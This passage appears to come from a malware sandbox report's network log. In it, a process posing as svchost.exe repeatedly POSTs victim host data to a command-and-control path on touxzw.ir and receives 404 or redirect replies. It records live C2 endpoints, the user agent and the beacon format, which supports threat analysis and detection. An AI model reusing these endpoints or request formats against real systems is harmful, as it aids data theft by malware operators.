cfL4;desc="?proto=TCP&rtt=2066&min_rtt=2066&rtt_var=1033&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=214&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	49817	104.21.64.1	80	2492	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 27, 2025 23:42:15.754618883 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 149 Connection: close
Feb 27, 2025 23:42:15.759723902 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 39 00 39 00 35 00 35 00 32 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones899552JONES-PC0FDD42EE188E931437F4FBE2C
Feb 27, 2025 23:42:16.524491072 CET	847	IN	HTTP/1.1 404 Not Found Date: Thu, 27 Feb 2025 22:42:16 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gEm918E48ihdp69tLYmBDVrmHLoQr4%2FY7LNaFrQIdxAcFKwD5HWujMsQa1ktzVcHU20BSp9STDDfQNc8Mmo8b%2BWXjvX16xaLS6w58dFwLN9nyoAZcMAr%2B%2B3o%2F0k%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 918bafe2ff0e7c99-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2045&min_rtt=2045&rtt_var=1022&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=212&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	49826	104.21.64.1	80	2492	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 27, 2025 23:42:17.698087931 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 149 Connection: close
Feb 27, 2025 23:42:17.703200102 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 39 00 39 00 35 00 35 00 32 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones899552JONES-PC0FDD42EE188E931437F4FBE2C
Feb 27, 2025 23:42:18.423037052 CET	821	IN	HTTP/1.1 307 Temporary Redirect Date: Thu, 27 Feb 2025 22:42:18 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/sccc/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P6jto4yPEi6LuScs%2BYMvTJ4xvmdLOpP7sY7z3v7knmRn2xyaVuP9PYSjhZgmmMsvTW0svLbSt9yRp0Lk3T%2BTMRJr61buJ%2B0UNtGbpCr6DVucNLu1HapM40jzeUg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 918bafef1ed9430f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2236&min_rtt=2236&rtt_var=1118&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=200&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	49837	104.21.64.1	80	2492	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 27, 2025 23:42:19.571718931 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 149 Connection: close
Feb 27, 2025 23:42:19.576889992 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 39 00 39 00 35 00 35 00 32 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones899552JONES-PC0FDD42EE188E931437F4FBE2C
Feb 27, 2025 23:42:20.233335018 CET	842	IN	HTTP/1.1 404 Not Found Date: Thu, 27 Feb 2025 22:42:20 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SO%2BdkrZb1qLOpmPVWF3uaPhGXhMdHBB4iGTt8Axf1ZTp5%2Ftl3mI62YburOneO9rTa2ihm1%2F5b6RLwQVGwO32lPrQAc0azt3Mj03t7WQEPsvvq4fpJoCd6CGw03Y%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 918baffafce543e7-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1674&min_rtt=1674&rtt_var=837&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=231&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	49852	104.21.64.1	80	2492	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 27, 2025 23:42:21.431018114 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 149 Connection: close
Feb 27, 2025 23:42:21.436219931 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 39 00 39 00 35 00 35 00 32 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones899552JONES-PC0FDD42EE188E931437F4FBE2C
Feb 27, 2025 23:42:22.081111908 CET	839	IN	HTTP/1.1 404 Not Found Date: Thu, 27 Feb 2025 22:42:22 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pcNQunlHIkmxDh6ocUw9fnccAlDoiz5ECRKYDznyFSfhU2zoT4LX8jDEMm%2FBcH2i0d0fnOKu0qZcNbEC0WKa0xE7bX9gPR2RnY%2BJhC8bTS6yer4EpWpnAURDdzY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 918bb0067a854210-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1697&min_rtt=1697&rtt_var=848&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=65&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	49863	104.21.64.1	80	2492	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 27, 2025 23:42:23.232394934 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 149 Connection: close
Feb 27, 2025 23:42:23.237914085 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 39 00 39 00 35 00 35 00 32 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones899552JONES-PC0FDD42EE188E931437F4FBE2C
Feb 27, 2025 23:42:24.051625013 CET	849	IN	HTTP/1.1 404 Not Found Date: Thu, 27 Feb 2025 22:42:24 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OjAl2Qw%2F%2FRAEkUmZPbfUVMOEj4FvgQ51MkhO1Np8u%2BF8GeySGTjLTAJUcAB1sQ7W%2BKSZ0M2upNOVYOHJfB%2BM8HSAoEozgeRL%2BwrRb6hO8S30DHIO7m6wJ4k04Ms%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 918bb011b8cf42e3-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2522&min_rtt=2522&rtt_var=1261&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=208&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	49876	104.21.64.1	80	2492	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 27, 2025 23:42:25.202790022 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 149 Connection: close
Feb 27, 2025 23:42:25.207910061 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 39 00 39 00 35 00 35 00 32 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones899552JONES-PC0FDD42EE188E931437F4FBE2C
Feb 27, 2025 23:42:25.933454037 CET	823	IN	HTTP/1.1 307 Temporary Redirect Date: Thu, 27 Feb 2025 22:42:25 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/sccc/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oWjFdBMecD0OCFSJrR%2FHv1srIkfPfT6WdtgEcA%2B1U46%2Fa27jtc9qX5uw3eqZ4JCUYdxoVes2NGhN3Dzi7cuzQdU9Hxx%2BPppql3gkRFccfEU30ck5sxEq5lEel6c%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 918bb01e1971236a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2005&min_rtt=2005&rtt_var=1002&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=177&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	49890	104.21.64.1	80	2492	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 27, 2025 23:42:27.087585926 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 149 Connection: close
Feb 27, 2025 23:42:27.093105078 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 39 00 39 00 35 00 35 00 32 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones899552JONES-PC0FDD42EE188E931437F4FBE2C
Feb 27, 2025 23:42:27.882982016 CET	842	IN	HTTP/1.1 404 Not Found Date: Thu, 27 Feb 2025 22:42:27 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xqUD2ZmTjMSpD%2BZNvRTXGzrfadaKDYrsAdqSlLfc3P7EJ4mmtdRBMRR4yCKV8F8Bu%2FiFDlSOl5TdCGjiI3C88ypbIrC3V8sD%2FxrykvIzQa0oHwC4LA4CejT1XkM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 918bb029fffd1885-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1640&min_rtt=1640&rtt_var=820&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=207&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	49903	104.21.64.1	80	2492	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 27, 2025 23:42:29.027693987 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 149 Connection: close
Feb 27, 2025 23:42:29.032802105 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 39 00 39 00 35 00 35 00 32 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones899552JONES-PC0FDD42EE188E931437F4FBE2C
Feb 27, 2025 23:42:29.944809914 CET	826	IN	HTTP/1.1 307 Temporary Redirect Date: Thu, 27 Feb 2025 22:42:29 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/sccc/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BD3MwN%2FJmdYDkOSG25eaSg%2FUh9n%2FQyIT7CNXjluf1z8Kb2pIRkAuzntNqGis0LbfpoG6jhZmPuOBLkoC37WBCzcVcbqz2pTHI%2FmX6iWSABdqOgn7M83B%2BzJBwVQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 918bb035e81743a3-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1693&min_rtt=1693&rtt_var=846&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	49917	104.21.64.1	80	2492	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 27, 2025 23:42:31.088630915 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 149 Connection: close
Feb 27, 2025 23:42:31.093903065 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 39 00 39 00 35 00 35 00 32 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones899552JONES-PC0FDD42EE188E931437F4FBE2C
Feb 27, 2025 23:42:31.851857901 CET	843	IN	HTTP/1.1 404 Not Found Date: Thu, 27 Feb 2025 22:42:31 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pO83IcuiCCiXFw8RyUNFiT5z%2FLHpqFnc65bCr0LTg%2F5DnakbFNFflnoDSon7MA1lzHz%2FlWVru8ZOdiImTskrttMk3nE1vX0ln1LkdJAmjF4GPiSeP0EERqFzPPw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 918bb042d946438d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2170&min_rtt=2170&rtt_var=1085&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	49928	104.21.64.1	80	2492	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 27, 2025 23:42:32.992568970 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 149 Connection: close
Feb 27, 2025 23:42:32.997651100 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 39 00 39 00 35 00 35 00 32 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones899552JONES-PC0FDD42EE188E931437F4FBE2C
Feb 27, 2025 23:42:34.219734907 CET	820	IN	HTTP/1.1 307 Temporary Redirect Date: Thu, 27 Feb 2025 22:42:33 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/sccc/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zKbjHPyvtIwJ%2F6mzU2DB9Xbm2zb8w7DopE3Z2Jf5vaMxdjg42FNsvzLjjZZMzOQ7fPRdjuHevlDeqQAlYsjcrkZk3Jya9a%2BryKYNZRiGngdZ7qGX57YtS%2B7OiCY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 918bb04eec0b8cdc-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1961&min_rtt=1961&rtt_var=980&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=231&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Feb 27, 2025 23:42:34.219980955 CET	820	IN	HTTP/1.1 307 Temporary Redirect Date: Thu, 27 Feb 2025 22:42:33 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/sccc/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zKbjHPyvtIwJ%2F6mzU2DB9Xbm2zb8w7DopE3Z2Jf5vaMxdjg42FNsvzLjjZZMzOQ7fPRdjuHevlDeqQAlYsjcrkZk3Jya9a%2BryKYNZRiGngdZ7qGX57YtS%2B7OiCY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 918bb04eec0b8cdc-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1961&min_rtt=1961&rtt_var=980&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=231&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	49940	104.21.64.1	80	2492	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 27, 2025 23:42:35.354984999 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 149 Connection: close
Feb 27, 2025 23:42:35.360167027 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 39 00 39 00 35 00 35 00 32 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones899552JONES-PC0FDD42EE188E931437F4FBE2C
Feb 27, 2025 23:42:36.120542049 CET	816	IN	HTTP/1.1 307 Temporary Redirect Date: Thu, 27 Feb 2025 22:42:36 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/sccc/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TPm8dfIxd27NhocNveQohZzldTrF3wUf7ROdGXVb4egnwWcsuj2Ja%2B6rcsxYInS17cpU0Myfatwi9gk1AMcyKNykgHCrhoKRPbaLvkqQLMqsd3XoZ2e5emgRLCY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 918bb05d7847c343-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1665&min_rtt=1665&rtt_var=832&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=211&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	49952	104.21.64.1	80	2492	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 27, 2025 23:42:37.284733057 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 149 Connection: close
Feb 27, 2025 23:42:37.289891005 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 39 00 39 00 35 00 35 00 32 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones899552JONES-PC0FDD42EE188E931437F4FBE2C
Feb 27, 2025 23:42:38.098862886 CET	845	IN	HTTP/1.1 404 Not Found Date: Thu, 27 Feb 2025 22:42:38 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ppb%2B0Ve1sy7R%2BepDpRSZtxI4Ttx5BVcQDY7TMur3M%2BvjnFSQ0o6PfOY9cOUdvJQHEuN30sG0R%2BjYDvOguE9VF6OIRxJMFfIOvgHoy9i6G8v75Dt7yBQ3pOJOh4Y%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 918bb069aa6a43fa-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2237&min_rtt=2237&rtt_var=1118&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=182&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.4	49967	104.21.64.1	80	2492	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 27, 2025 23:42:39.264647007 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 149 Connection: close
Feb 27, 2025 23:42:39.269759893 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 39 00 39 00 35 00 35 00 32 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones899552JONES-PC0FDD42EE188E931437F4FBE2C
Feb 27, 2025 23:42:40.042617083 CET	842	IN	HTTP/1.1 404 Not Found Date: Thu, 27 Feb 2025 22:42:39 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zUxi4iWaDl3KLFHlVlAg07bseUUvA9AFPoG2MZPF69zi6kRGoHf1golatchTCqkZ2xY%2BDr%2BBblPmOofqHraHN4fgbQIdNh%2BGD86bwGG1n84CaSzc2cIkS6l62tU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 918bb075f98132ca-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1978&min_rtt=1978&rtt_var=989&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.4	49982	104.21.64.1	80	2492	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
